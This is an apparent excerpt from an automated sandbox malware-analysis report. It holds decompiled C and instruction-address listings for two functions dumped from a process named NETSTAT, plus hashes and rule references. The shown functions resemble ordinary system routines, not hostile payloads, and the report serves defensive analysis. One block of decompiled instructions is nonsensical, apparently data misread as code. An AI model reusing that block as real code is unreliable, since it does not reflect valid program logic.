                0x033b48b7
                0x033b48ba
                0x033b48bc
                0x033b48c6
                0x033b48c6
                0x033b48cb
                0x033b48d1
                0x033b48d4
                0x033b48d8
                0x033b48d8
                0x00000000
                0x033b48d8
                0x033b48be
                0x033b48c0
                0x00000000
                0x00000000
                0x033b48c2
                0x00000000
                0x00000000
                0x00000000
                0x033b48c4
                0x00000000
                0x033b4882
                0x033b487b
                0x033b4904
                0x033b4906
                0x00000000
                0x00000000
                0x033b4908
                0x033b490e
                0x00000000
                0x00000000
                0x033b4910
                0x033b4917
                0x033b4917
                0x00000000
                0x033b4917
                0x0335b1ba
                0x033b47f9
                0x033b47fc
                0x00000000
                0x00000000
                0x00000000
                0x033b47fc
                0x0335b1c0
                0x0335b1c0
                0x0335b1c3
                0x0335b1cb
                0x00000000
                0x00000000
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: _vswprintf_s
                • String ID:
                • API String ID: 677850445-0
                • Opcode ID: 562652dd39de8ca2af4e4fdb42f05e2d44e370d804ed46f3d6df162cafbd9a7f
                • Instruction ID: 45bf04e5e3adcbf8cc1c3eec558f26db093405748964789e628f62b2152c84c2
                • Opcode Fuzzy Hash: 562652dd39de8ca2af4e4fdb42f05e2d44e370d804ed46f3d6df162cafbd9a7f
                • Instruction Fuzzy Hash: C051EF75D043698EEF31CF69C880BFEBBB4AF00710F2441A9E959ABA82D7314941CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E0337B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x344d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03377D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03428CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03399E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0339B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0339CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03377D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03428F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0339AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3448628; // 0x0
								_v68 = _t77;
								_t78 =  *0x344862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3448628; // 0x0
							_t116 =  *0x344862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                0x0337b94c
                0x0337b956
                0x0337b95c
                0x0337b95e
                0x0337b964
                0x0337b969
                0x0337b96d
                0x0337b96d
                0x0337b970
                0x0337b974
                0x0337b97a
                0x0337badf
                0x0337badf
                0x0337bae2
                0x0337bae4
                0x0337bae6
                0x0337baf0
                0x033c2cb8
                0x0337baf6
                0x0337baf6
                0x0337baf6
                0x0337bafd
                0x0337bb1f
                0x0337bb1f
                0x0337baff
                0x0337bb00
                0x0337bb00
                0x0337bb03
                0x0337bb03
                0x0337bacb
                0x0337bacf
                0x0337bad0
                0x0337bad1
                0x0337badc
                0x0337badc
                0x0337b980
                0x0337b980
                0x0337b988
                0x0337b98b
                0x0337b98d
                0x0337b990
                0x0337b993
                0x0337b999
                0x0337b99b
                0x0337b9a1
                0x0337b9a5
                0x0337b9aa
                0x0337b9b0
                0x0337b9bb
                0x0337b9c0
                0x0337b9c3
                0x0337b9ca
                0x0337b9cc
                0x0337b9cf
                0x0337b9d3
                0x0337b9d7
                0x0337ba94
                0x0337ba94
                0x0337ba98
                0x0337baa3
                0x033c2ccb
                0x0337baa9
                0x0337baa9
                0x0337baa9
                0x0337bab1
                0x033c2cd5
                0x033c2cdd
                0x033c2cdd
                0x0337babb
                0x0337babc
                0x0337bac2
                0x0337bac3
                0x0337bac3
                0x0337bac6
                0x00000000
                0x0337b9dd
                0x0337b9dd
                0x0337b9e7
                0x0337b9e7
                0x0337b9ec
                0x0337b9ec
                0x0337b9f1
                0x0337b9f5
                0x0337b9fa
                0x0337ba00
                0x0337ba0c
                0x0337ba10
                0x0337ba10
                0x0337ba12
                0x0337ba18
                0x00000000
                0x00000000
                0x0337bb26
                0x0337bb26
                0x0337ba1e
                0x0337ba1e
                0x0337ba23
                0x0337ba25
                0x0337ba2c
                0x0337ba30
                0x0337ba35
                0x0337ba35
                0x0337ba41
                0x0337ba46
                0x0337ba4c
                0x0337ba50
                0x0337ba54
                0x0337ba6a
                0x0337ba6e
                0x0337ba70
                0x0337ba74
                0x0337ba78
                0x0337ba7a
                0x0337ba7c
                0x0337ba8e
                0x0337ba90
                0x0337ba92
                0x0337bb14
                0x0337bb14
                0x0337bb16
                0x0337bb16
                0x00000000
                0x0337ba7c
                0x0337bb0a
                0x0337bb0d
                0x00000000
                0x00000000
                0x00000000
                0x0337bb0f

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0337B9A5
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID:
                • API String ID: 885266447-0
                • Opcode ID: d61fc24ebae563322c09f08b288ddf434bf6307cb054aec1f4bf14259343b6f3
                • Instruction ID: 5286abad6f26fcdf16e8f09d186935e005813a33dddc18b63e95917e1548510f
                • Opcode Fuzzy Hash: d61fc24ebae563322c09f08b288ddf434bf6307cb054aec1f4bf14259343b6f3
                • Instruction Fuzzy Hash: 96514675A08344CFC720EF29C4C092AFBF9BB88600F18896EF9959B354D735E844CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03382581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 83%
                			E03382581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912564) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				void* _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				signed int _t271;
				signed int _t273;
				intOrPtr* _t275;
				signed int _t276;
				unsigned int _t279;
				signed int _t283;
				signed int _t286;
				signed int _t290;
				intOrPtr _t302;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t318;
				signed int _t319;
				void* _t323;
				signed int _t324;
				signed int _t326;
				signed int _t329;
				void* _t330;
				void* _t333;
				void* _t334;

				_t326 = _t329;
				_t330 = _t329 - 0x4c;
				_v8 =  *0x344d360 ^ _t326;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t318 = 0x344b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t279 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t334 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t271 = 0x48;
				_t300 = 0 | _t334 == 0x00000000;
				_t311 = 0;
				_v37 = _t334 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t319 = 0xc0000106;
						goto L32;
					} else {
						_t318 = L03374620(_t279,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t318;
						__eflags = _t318;
						if(_t318 == 0) {
							_t319 = 0xc0000017;
							goto L32;
						} else {
							 *(_t318 + 0x44) =  *(_t318 + 0x44) & 0x00000000;
							_t50 = _t318 + 0x48; // 0x48
							_t313 = _t50;
							_t300 = _v32;
							 *(_t318 + 0x3c) = _t271;
							_t273 = 0;
							 *((short*)(_t318 + 0x30)) = _v48;
							__eflags = _t300;
							if(_t300 != 0) {
								 *(_t318 + 0x18) = _t313;
								__eflags = _t300 - 0x3448478;
								 *_t318 = ((0 | _t300 == 0x03448478) - 0x00000001 & 0xfffffffb) + 7;
								E0339F3E0(_t313,  *((intOrPtr*)(_t300 + 4)),  *_t300 & 0x0000ffff);
								_t300 = _v32;
								_t330 = _t330 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t313 = _t313 + (( *_t300 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E033E39F2(_t313);
									_t300 = _v32;
									_t313 = _t265;
								}
							}
							_t283 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t319 = _v68;
								__eflags = 0;
								 *((short*)(_t313 - 2)) = 0;
								goto L32;
							} else {
								_t271 = _t318 + _t273 * 4;
								_v56 = _t271;
								do {
									__eflags = _t300;
									if(_t300 != 0) {
										_t230 =  *(_v60 + _t283 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t271 =  *(_v60 + _t283 * 4);
										 *(_t271 + 0x18) = _t313;
										_t234 =  *(_v60 + _t283 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M03382959))) {
												case 0:
													__ax =  *0x3448488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0339F3E0(__edi,  *0x344848c, __ax & 0x0000ffff);
														__eax =  *0x3448488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0339F3E0(_t313, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x3448480 & 0x0000ffff = E0339F3E0(__edi,  *0x3448484,  *0x3448480 & 0x0000ffff);
													__eax =  *0x3448480 & 0x0000ffff;
													__eax = ( *0x3448480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0339F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0339F3E0(_t313, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t330 = _t330 + 0xc;
													_t313 = _t313 + (_t260 >> 1) * 2 + 2;
													__eflags = _t313;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t313 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx =  *0x344575c;
													__eflags = __ebx - 0x344575c;
													if(__ebx != 0x344575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0339F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x344575c;
														} while (__ebx != 0x344575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3448478 & 0x0000ffff = E0339F3E0(__edi,  *0x344847c,  *0x3448478 & 0x0000ffff);
													__eax =  *0x3448478 & 0x0000ffff;
													__eax = ( *0x3448478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E033E39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3446e58 & 0x0000ffff = E0339F3E0(__edi,  *0x3446e5c,  *0x3446e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3446e58 & 0x0000ffff;
													__eax = ( *0x3446e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t283 = _v16;
													_t300 = _v32;
													L29:
													_t271 = _t271 + 4;
													__eflags = _t271;
													_v56 = _t271;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t283 = _t283 + 1;
									_v16 = _t283;
									__eflags = _t283 - _v48;
								} while (_t283 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t311 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M03382935))) {
							case 0:
								__ax =  *0x3448488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t300 =  &_v64;
								_v80 = E03382E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3448480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3448480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0336EEF0(0x34479a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0336EB70(__ecx, 0x34479a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t319;
												if(_t319 < 0) {
													L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t279 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3447b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0336EB70(__ecx, 0x34479a0);
										__eax = _v52;
										L36:
										_pop(_t312);
										_pop(_t320);
										__eflags = _v8 ^ _t326;
										_pop(_t272);
										return E0339B640(_t209, _t272, _v8 ^ _t326, _t300, _t312, _t320);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t300 =  &_v36;
									_t269 = E03382E3E(_t267,  &_v36);
									_t279 = _v36;
									_v76 = _t269;
								}
								if(_t279 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t279;
								}
								goto L14;
							case 6:
								__eax =  *0x3445764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3448478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3448478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3446e58 & 0x0000ffff;
								__eax = ( *0x3446e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t311 = _t311 + 1;
								if(_t311 >= _v48) {
									goto L16;
								} else {
									_t300 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags =  *_t271 - _t234;
					asm("o16 sub [eax], bh");
					asm("daa");
					 *_t271 - _t234 =  *[es:ebx] - _t234;
					 *_t234 =  *_t234 - _t271;
					_t235 = _t234 +  *0x1f033826;
					_t275 = 0x25;
					__eflags = _t235 - 3;
					_t236 = _t330 + _t234;
					_t333 = _t235;
					 *_t236 =  *_t236 - _t275;
					 *_t236 =  *_t236 - _t313;
					_t237 = _t236 +  *((intOrPtr*)(_t236 - 0x9fcc7d8));
					asm("daa");
					__eflags =  *_t275 - _t237;
					_push(ds);
					 *_t237 =  *_t237 - _t275;
					__eflags =  *_t275 - _t237;
					asm("daa");
					__eflags =  *_t275 - _t237;
					asm("fcomp dword [ebx+0x3c]");
					_t323 = _t318 + 1 +  *0x2033c5b +  *((intOrPtr*)(_t237 +  &_a1546912564));
					__eflags = _t237 - 3;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x342ff00);
					E033AD08C(_t275, _t313, _t323);
					_v44 =  *[fs:0x18];
					_t314 = 0;
					 *_a24 = 0;
					_t276 = _a12;
					__eflags = _t276;
					if(_t276 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t324 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t290 = _t242 * 0xc;
							_v48 = _t290;
							__eflags = _t276 -  *((intOrPtr*)(_t290 + 0x3331664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E0339E5C0(_a8,  *((intOrPtr*)(_t290 + 0x3331668)), _t276);
									_t333 = _t333 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t324 = E033D51BE(_t276,  *((intOrPtr*)(_v48 + 0x333166c)), _a16, _t314, _t324, __eflags, _a20, _a24);
										_v52 = _t324;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t324;
						__eflags = _t324;
						if(_t324 < 0) {
							__eflags = _t324 - 0xc0000100;
							if(_t324 == 0xc0000100) {
								_t286 = _a4;
								__eflags = _t286;
								if(_t286 != 0) {
									_v36 = _t286;
									__eflags =  *_t286 - _t314;
									if( *_t286 == _t314) {
										_t324 = 0xc0000100;
										goto L76;
									} else {
										_t302 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t302 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t286;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t286) {
											__eflags =  *(_t302 + 0x1c);
											if( *(_t302 + 0x1c) == 0) {
												L106:
												_t324 = E03382AE4( &_v36, _a8, _t276, _a16, _a20, _a24);
												_v32 = _t324;
												__eflags = _t324 - 0xc0000100;
												if(_t324 != 0xc0000100) {
													goto L69;
												} else {
													_t314 = 1;
													_t286 = _v36;
													goto L75;
												}
											} else {
												_t247 = E03366600( *(_t302 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t286 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t324 = E03382C50(_t286, _a8, _t276, _a16, _a20, _a24, _t314);
											L76:
											_v32 = _t324;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t324 = _a24;
									_t254 = E03382AE4( &_v36, _a8, _t276, _a16, _a20, _t324);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E03382C50(_v36, _a8, _t276, _a16, _a20, _t324, 1);
									}
									_v8 = _t314;
									E03382ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t324;
					}
					L70:
					return E033AD0D1(_t240);
				}
				L108:
			}






















































                0x03382584
                0x03382586
                0x03382590
                0x03382596
                0x03382597
                0x03382598
                0x03382599
                0x0338259e
                0x033825a4
                0x033825a9
                0x033825ac
                0x033825ae
                0x033825b1
                0x033825b2
                0x033825b5
                0x033825b8
                0x033825bb
                0x033825bc
                0x033825bf
                0x033825c2
                0x033825c5
                0x033825c6
                0x033825cb
                0x033825ce
                0x033825d8
                0x033825db
                0x033825dd
                0x033825de
                0x033825e1
                0x033825e3
                0x033825e9
                0x033826da
                0x033826da
                0x033826dd
                0x033826e2
                0x033c5b56
                0x00000000
                0x033826e8
                0x033826f9
                0x033826fb
                0x033826fe
                0x03382700
                0x033c5b60
                0x00000000
                0x03382706
                0x03382706
                0x0338270a
                0x0338270a
                0x0338270d
                0x03382713
                0x03382716
                0x03382718
                0x0338271c
                0x0338271e
                0x033c5b6c
                0x033c5b6f
                0x033c5b7f
                0x033c5b89
                0x033c5b8e
                0x033c5b93
                0x033c5b96
                0x033c5b9c
                0x033c5ba0
                0x033c5ba3
                0x033c5bab
                0x033c5bb0
                0x033c5bb3
                0x033c5bb3
                0x033c5ba3
                0x03382724
                0x03382726
                0x03382729
                0x0338272c
                0x0338279d
                0x0338279d
                0x033827a0
                0x033827a2
                0x00000000
                0x0338272e
                0x0338272e
                0x03382731
                0x03382734
                0x03382734
                0x03382736
                0x033c5bc1
                0x033c5bc1
                0x033c5bc4
                0x00000000
                0x033c5bca
                0x033c5bca
                0x033c5bcd
                0x00000000
                0x033c5bd3
                0x00000000
                0x033c5bd3
                0x033c5bcd
                0x0338273c
                0x0338273c
                0x03382742
                0x03382747
                0x0338274a
                0x0338274d
                0x03382750
                0x00000000
                0x03382756
                0x03382756
                0x00000000
                0x03382902
                0x03382908
                0x0338290b
                0x00000000
                0x03382911
                0x0338291c
                0x03382921
                0x00000000
                0x03382921
                0x00000000
                0x00000000
                0x03382880
                0x03382887
                0x0338288c
                0x00000000
                0x00000000
                0x03382805
                0x0338280a
                0x03382814
                0x03382816
                0x00000000
                0x00000000
                0x0338281e
                0x03382821
                0x03382823
                0x00000000
                0x03382829
                0x03382829
                0x03382831
                0x0338283c
                0x0338283e
                0x00000000
                0x0338283e
                0x00000000
                0x00000000
                0x0338284e
                0x03382850
                0x03382851
                0x03382854
                0x03382857
                0x0338285a
                0x0338285c
                0x0338285d
                0x00000000
                0x00000000
                0x0338275d
                0x03382761
                0x00000000
                0x03382767
                0x0338276e
                0x03382773
                0x03382773
                0x03382776
                0x03382778
                0x0338277e
                0x0338277e
                0x03382781
                0x03382781
                0x03382783
                0x03382784
                0x00000000
                0x00000000
                0x033c5bd8
                0x033c5bde
                0x033c5be4
                0x033c5be6
                0x033c5be8
                0x033c5be9
                0x033c5bee
                0x033c5bf8
                0x033c5bff
                0x033c5c01
                0x033c5c04
                0x033c5c07
                0x033c5c0b
                0x033c5c0d
                0x033c5c0d
                0x033c5c15
                0x033c5c18
                0x033c5c1b
                0x033c5c1b
                0x033c5c1e
                0x00000000
                0x00000000
                0x033828c3
                0x033828c8
                0x033828d2
                0x033828d4
                0x033828d8
                0x033828db
                0x033c5c26
                0x033c5c28
                0x033c5c2d
                0x033c5c2d
                0x00000000
                0x00000000
                0x033c5c34
                0x033c5c36
                0x033c5c49
                0x033c5c4e
                0x033c5c54
                0x033c5c5b
                0x033c5c5d
                0x033c5c60
                0x03382788
                0x03382788
                0x0338278b
                0x0338278e
                0x0338278e
                0x0338278e
                0x03382791
                0x00000000
                0x00000000
                0x03382756
                0x03382750
                0x00000000
                0x03382794
                0x03382794
                0x03382795
                0x03382798
                0x03382798
                0x00000000
                0x03382734
                0x0338272c
                0x03382700
                0x033825ef
                0x033825ef
                0x033825ef
                0x033825f2
                0x033825f8
                0x00000000
                0x00000000
                0x033825fe
                0x00000000
                0x033828e6
